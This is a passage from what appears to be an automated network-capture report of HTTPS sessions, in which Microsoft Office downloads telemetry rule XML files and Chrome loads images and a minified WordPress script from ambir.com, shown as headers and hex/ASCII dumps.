                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                              ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                              x-ms-request-id: bfe6cc7a-201e-006e-7e8c-3abbe3000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202820Z-1777c6cb754xrr98hC1TEB3kag0000000a1g000000000273
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:21 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              36192.168.2.54975713.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:20 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:20 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 474
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                              ETag: "0x8DC582B9964B277"
                                                                                                                                                                                              x-ms-request-id: 3126d9de-f01e-0099-4d8c-3a9171000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202820Z-1777c6cb754g9zd5hC1TEBfvpw0000000a8g000000008uk7
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:21 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              37192.168.2.54975913.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:20 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:21 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 471
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                              ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                              x-ms-request-id: 17c3c293-501e-00a3-6567-3bc0f2000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202821Z-178bfbc474bmqmgjhC1NYCy16c00000000m0000000009s1t
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:21 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              38192.168.2.54976013.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:20 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:21 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 632
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                              ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                              x-ms-request-id: 70a275ef-201e-0051-048c-3a7340000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202821Z-r1d97b9957744xz5hC1TEB5bf8000000097000000000enty
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:21 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              39192.168.2.54976113.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:21 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:21 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 467
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                              ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                              x-ms-request-id: 7f65a9a1-801e-0067-788c-3afe30000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202821Z-1777c6cb754gc8g6hC1TEB966c0000000a1000000000p3y0
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:21 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              40192.168.2.549764141.193.213.114431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:21 UTC375OUTGET /wp-content/themes/ambir/images/search2.png HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:21 UTC463INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:21 GMT
                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                              Content-Length: 272
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                              Cf-Polished: origSize=392
                                                                                                                                                                                              ETag: "651c3a0d-188"
                                                                                                                                                                                              Last-Modified: Tue, 03 Oct 2023 15:58:05 GMT
                                                                                                                                                                                              Vary: Accept
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 10823
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2f9abc747279-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:21 UTC272INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 14 00 00 00 14 08 04 00 00 00 27 80 d5 86 00 00 00 20 63 48 52 4d 00 00 7a 25 00 00 80 83 00 00 f9 ff 00 00 80 e9 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 6f 92 5f c5 46 00 00 00 ab 49 44 41 54 78 da b5 cf 51 ad c3 30 0c 46 e1 42 28 84 40 18 84 40 09 84 40 18 83 51 08 84 42 08 84 32 28 84 96 c1 77 a5 2b 55 8b 16 3f ec 65 c7 4f fe 75 6c d9 cb 8d ac 39 40 57 ad 4b 84 d5 06 76 5d 77 e1 54 22 6d c7 26 dd 89 e2 40 fd 14 37 3c c3 e1 3c 46 19 db 32 21 b9 1c 63 d0 90 96 00 2f 3c de ed 61 5f 42 64 e3 49 e8 b1 28 4d e2 77 1b bb 33 16 15 94 77 5b 51 42 b1 1b df b4 ba 1c d6 70 5f 9b a3 5d 9a 32 d3 b8 8a d3 4b 96 64 45 07 b4 e8 c3 dd 48 b3 6a 83 3a e2 e1 f9 5f e5 3e 63 52 23 7e ae d6 ef d4 2a fd 01 61 1c db
                                                                                                                                                                                              Data Ascii: PNGIHDR' cHRMz%u0`:o_FIDATxQ0FB(@@@QB2(w+U?eOul9@WKv]wT"m&@7<<F2!c/<a_BdI(Mw3w[QBp_]2KdEHj:_>cR#~*a


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              41192.168.2.549765141.193.213.114431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:21 UTC375OUTGET /wp-content/themes/ambir/images/cerrar2.png HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:21 UTC464INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:21 GMT
                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                              Content-Length: 765
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                              Cf-Polished: origSize=1012
                                                                                                                                                                                              ETag: "651c3a0e-3f4"
                                                                                                                                                                                              Last-Modified: Tue, 03 Oct 2023 15:58:06 GMT
                                                                                                                                                                                              Vary: Accept
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 10823
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2f9b0b93c35f-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:21 UTC765INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 2e 00 00 00 2e 08 04 00 00 00 fd b0 e3 bc 00 00 01 19 69 43 43 50 69 63 63 00 00 78 da 63 60 60 32 70 74 71 72 65 12 60 60 c8 cd 2b 29 0a 72 77 52 88 88 8c 52 60 3f cf c0 c6 c0 cc 00 06 89 c9 c5 05 8e 01 01 3e 20 76 5e 7e 5e 2a 03 06 f8 76 8d 81 11 44 5f d6 05 99 c5 40 1a e0 4a 2e 28 2a 01 d2 7f 80 d8 28 25 b5 38 99 81 81 d1 00 c8 ce 2e 2f 29 28 01 b2 e7 00 d9 22 49 d9 60 f6 06 10 bb 28 24 c8 19 c8 3e 02 64 f3 a5 43 d8 57 40 ec 24 08 fb 09 88 5d 04 f4 04 90 fd 05 a4 3e 1d cc 66 e2 00 9b 03 61 cb 80 d8 25 a9 15 20 7b 19 9c f3 0b 2a 8b 32 d3 33 4a 14 0c 2d 2d 2d 15 1c 53 f2 93 52 15 82 2b 8b 4b 52 73 8b 15 3c f3 92 f3 8b 0a f2 8b 12 4b 52 53 80 6a c1 ee 83 00 41 88 42 50 88 69 00 35 5a 68 32 50 19 80
                                                                                                                                                                                              Data Ascii: PNGIHDR..iCCPiccxc``2ptqre``+)rwRR`?> v^~^*vD_@J.(*(%8./)("I`($>dCW@$]>fa% {*23J---SR+KRs<KRSjABPi5Zh2P


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              42192.168.2.549767141.193.213.114431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:21 UTC412OUTGET /wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-footer-71030d0b.min.js HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:22 UTC490INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:21 GMT
                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Last-Modified: Wed, 20 Nov 2024 18:27:07 GMT
                                                                                                                                                                                              ETag: W/"673e29fb-65fa"
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 6834
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2f9c989c42d7-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:22 UTC879INData Raw: 36 35 66 61 0d 0a 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 3d 7b 64 3a 28 65 2c 6e 29 3d 3e 7b 66 6f 72 28 76 61 72 20 72 20 69 6e 20 6e 29 74 2e 6f 28 6e 2c 72 29 26 26 21 74 2e 6f 28 65 2c 72 29 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 72 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 6e 5b 72 5d 7d 29 7d 2c 6f 3a 28 74 2c 65 29 3d 3e 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 74 2c 65 29 2c 72 3a 74 3d 3e 7b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 53 79 6d
                                                                                                                                                                                              Data Ascii: 65fa/*! This file is auto-generated */(()=>{"use strict";var t={d:(e,n)=>{for(var r in n)t.o(n,r)&&!t.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:n[r]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{"undefined"!=typeof Symbol&&Sym
                                                                                                                                                                                              2024-11-20 20:28:22 UTC1369INData Raw: 2f 5e 5b 61 2d 7a 41 2d 5a 5d 5b 61 2d 7a 41 2d 5a 30 2d 39 5f 2e 5c 2d 5c 2f 5d 2a 24 2f 2e 74 65 73 74 28 74 29 7c 7c 28 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 54 68 65 20 6e 61 6d 65 73 70 61 63 65 20 63 61 6e 20 6f 6e 6c 79 20 63 6f 6e 74 61 69 6e 20 6e 75 6d 62 65 72 73 2c 20 6c 65 74 74 65 72 73 2c 20 64 61 73 68 65 73 2c 20 70 65 72 69 6f 64 73 2c 20 75 6e 64 65 72 73 63 6f 72 65 73 20 61 6e 64 20 73 6c 61 73 68 65 73 2e 22 29 2c 21 31 29 7d 3b 63 6f 6e 73 74 20 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 74 7c 7c 22 22 3d 3d 3d 74 3f 28 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 54 68 65 20 68 6f 6f 6b 20 6e 61 6d 65 20 6d 75 73 74 20 62 65 20 61 20 6e 6f 6e 2d 65 6d 70 74
                                                                                                                                                                                              Data Ascii: /^[a-zA-Z][a-zA-Z0-9_.\-\/]*$/.test(t)||(console.error("The namespace can only contain numbers, letters, dashes, periods, underscores and slashes."),!1)};const r=function(t){return"string"!=typeof t||""===t?(console.error("The hook name must be a non-empt
                                                                                                                                                                                              2024-11-20 20:28:22 UTC1369INData Raw: 65 28 65 2c 31 29 2c 6c 2b 2b 2c 63 2e 5f 5f 63 75 72 72 65 6e 74 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e 7b 74 2e 6e 61 6d 65 3d 3d 3d 69 26 26 74 2e 63 75 72 72 65 6e 74 49 6e 64 65 78 3e 3d 65 26 26 74 2e 63 75 72 72 65 6e 74 49 6e 64 65 78 2d 2d 7d 29 29 29 7d 72 65 74 75 72 6e 22 68 6f 6f 6b 52 65 6d 6f 76 65 64 22 21 3d 3d 69 26 26 74 2e 64 6f 41 63 74 69 6f 6e 28 22 68 6f 6f 6b 52 65 6d 6f 76 65 64 22 2c 69 2c 73 29 2c 6c 7d 7d 3b 63 6f 6e 73 74 20 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 2c 72 29 7b 63 6f 6e 73 74 20 6f 3d 74 5b 65 5d 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 21 3d 3d 72 3f 6e 20 69 6e 20 6f 26 26 6f 5b 6e 5d 2e 68 61 6e 64 6c 65 72 73 2e 73 6f 6d 65 28 28 74 3d 3e 74 2e 6e
                                                                                                                                                                                              Data Ascii: e(e,1),l++,c.__current.forEach((t=>{t.name===i&&t.currentIndex>=e&&t.currentIndex--})))}return"hookRemoved"!==i&&t.doAction("hookRemoved",i,s),l}};const s=function(t,e){return function(n,r){const o=t[e];return void 0!==r?n in o&&o[n].handlers.some((t=>t.n
                                                                                                                                                                                              2024-11-20 20:28:22 UTC1369INData Raw: 29 2c 74 68 69 73 2e 72 65 6d 6f 76 65 41 6c 6c 41 63 74 69 6f 6e 73 3d 69 28 74 68 69 73 2c 22 61 63 74 69 6f 6e 73 22 2c 21 30 29 2c 74 68 69 73 2e 72 65 6d 6f 76 65 41 6c 6c 46 69 6c 74 65 72 73 3d 69 28 74 68 69 73 2c 22 66 69 6c 74 65 72 73 22 2c 21 30 29 2c 74 68 69 73 2e 64 6f 41 63 74 69 6f 6e 3d 63 28 74 68 69 73 2c 22 61 63 74 69 6f 6e 73 22 29 2c 74 68 69 73 2e 61 70 70 6c 79 46 69 6c 74 65 72 73 3d 63 28 74 68 69 73 2c 22 66 69 6c 74 65 72 73 22 2c 21 30 29 2c 74 68 69 73 2e 63 75 72 72 65 6e 74 41 63 74 69 6f 6e 3d 6c 28 74 68 69 73 2c 22 61 63 74 69 6f 6e 73 22 29 2c 74 68 69 73 2e 63 75 72 72 65 6e 74 46 69 6c 74 65 72 3d 6c 28 74 68 69 73 2c 22 66 69 6c 74 65 72 73 22 29 2c 74 68 69 73 2e 64 6f 69 6e 67 41 63 74 69 6f 6e 3d 75 28 74 68 69
                                                                                                                                                                                              Data Ascii: ),this.removeAllActions=i(this,"actions",!0),this.removeAllFilters=i(this,"filters",!0),this.doAction=c(this,"actions"),this.applyFilters=c(this,"filters",!0),this.currentAction=l(this,"actions"),this.currentFilter=l(this,"filters"),this.doingAction=u(thi
